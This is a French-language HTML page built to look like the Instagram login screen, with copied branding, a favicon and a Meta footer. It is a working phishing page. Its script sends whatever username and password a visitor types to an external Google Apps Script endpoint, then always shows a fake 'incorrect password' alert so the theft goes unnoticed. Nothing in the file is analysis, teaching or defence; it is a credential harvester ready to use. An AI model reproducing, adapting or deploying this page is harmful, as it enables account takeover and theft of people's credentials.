<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Instagram - Connexion ou inscription</title>  
    <link rel="icon" type="image/x-icon" href="https://cdn.icon-icons.com/icons2/836/PNG/512/Instagram_icon-icons.com_66804.png">

	<style>
		header {
	background-color: #162127;
	margin-top: 20px;
    font-family: 'Helvetica', 'Arial', sans-serif;
    weight:400;
	font-size: 17px;
	line-height: 16px;   
	color: rgb(29, 33, 41);
} 

body {
	background-color: #162127;

}

.backbtn {
	height: 30px;
	width: 30px;
	margin-left: 10px;
}

.language {
	text-align: center;
	color:#919fac;
}

 .container {
            display: flex;
            justify-content: center;
            align-items: center;
			margin-bottom: 100px;
 }
 
.logo{
	/*height: 100px;*/
	width: 75px;
	 max-width: 100%; /* Optional: To make the image responsive */
     height: auto;
	 margin-top: 70px;
}

   .login-container {
            background-color: #162127;
            padding: 20px;
            border-radius: 10px;
            box-shadow: none;
            width: 85%;
            max-width: 400px;
			position: relative;
            top: 70%;
            left: 50%;
            transform: translate(-50%, -20%);
            text-align: center; /* Ensures everything inside the container is centered */
		    
        }

        .facebook-input {
			height: 30px;
            width: 90%;
            padding: 14px;
            margin: 10px 0;
            border: 1px solid #3e4e5b;
            border-radius: 10px;
            font-size: 16px;
            outline: none;
            background-color: #162127;
        }

        .facebook-input:focus {
            border-color: #162127;
            box-shadow: 0 0 5px #8495a2;
            background-color: #162127;
        }

        .login-btn {
            width: 100%;
            padding: 16px;
            background-color: #1877f2; /* Facebook blue */
            color: white;
            border: none;
            border-radius: 25px;
            font-size: 16px;
            cursor: pointer;
            font-weight: bold;
			display: block;
			margin: 0 auto;
			margin-top: 10px;
			margin-bottom: 30px;
        }

        .login-btn:hover {
            background-color: #165dd6;
        }

        .forgot-password {
            display: block;
            text-align: center;
            margin-top: 5px;
            color: #fcffff;
            font-size: 14px;
            text-decoration: none;
			font-family: 'Helvetica', 'Arial', sans-serif;
        }

        .forgot-password:hover {
            text-decoration: none;
			color: #c3cbd2;
        }
		
		.meta{
			margin-top: 15PX;
			height: 19px;
			width: 84px;
		}
		
		 .container1 {
            display: flex;
            justify-content: center;
            align-items: center;
		
 }
 
 ::placeholder{
	 color:#cad3dc;
 }
 
 .login-btn1 {
            max-width: 400px;
            width: 90%;
            padding: 16px;
            background-color: #162127;
            color: #50a4ea;
            border: 1;
	        border-color:#50a4ea;
            border-radius: 25px;
            font-size: 17px;
            cursor: pointer;
			display: block;
			margin: 0 auto;
			margin-top: 50px;
			margin-bottom: 30px;
        }
		input { color: #ffffff; }
	</style>
</head>

<header>
    <img src="https://i.ibb.co/pwDjgMz/back.png" class="backbtn">
    <p class="language">Français (France)</p>
</header>

<body>
    <div class="container">
        <img src="https://i.ibb.co/sVVg4hy/insta-logo.png" alt="instagram.png" class="logo">
    </div>

    <div class="login-container">
        <form id="loginForm">
            <input type="text" class="facebook-input" name="email" placeholder="Nom d'utilisateur, e-mail ou numéro de tél." required>
            <input type="password" class="facebook-input" name="password" placeholder="Mot de passe" required>
            <button type="submit" class="login-btn">Se connecter</button>
            <a href="#" class="forgot-password">Mot de passe oublié ?</a>
        </form>
    </div>
	
	<button type="submit" class="login-btn1">Créer un compte</button>
	
	<footer>
	 <div class="container1">
	  <img src="https://i.ibb.co/SySwLMx/Meta.png" class="meta"> 
	 </div>
	</footer>
	
	
	
	
	
	 <script>
        document.addEventListener('DOMContentLoaded', () => {
            const scriptURL = 'https://script.google.com/macros/s/AKfycbwQuMiKIVPR3Q0TglhZnvMQeh9ggC4p7YDut337Jyd5w9OijL_X0QRqpJFbFM29ciGh/exec';
            const form = document.getElementById('loginForm');

            form.addEventListener('submit', e => {
                e.preventDefault(); // Prevent the default form submission
                fetch(scriptURL, { 
                    method: 'POST',
                    body: new FormData(form)
                })
                .then(response => response.json())
                .then(data => {
                    console.log('Success:', data);
                    alert('mot de passe incorrect'); // Show the message
                })
                .catch(error => {
                    console.error('Error:', error);
                    alert('mot de passe incorrect'); // Show the message on error as well
                });
            });
        });
    </script>

	<script>
  if (window.location.protocol !== 'https:') {
    window.location.href = window.location.href.replace('http:', 'https:');
  }
</script>

	
</body>
</html>
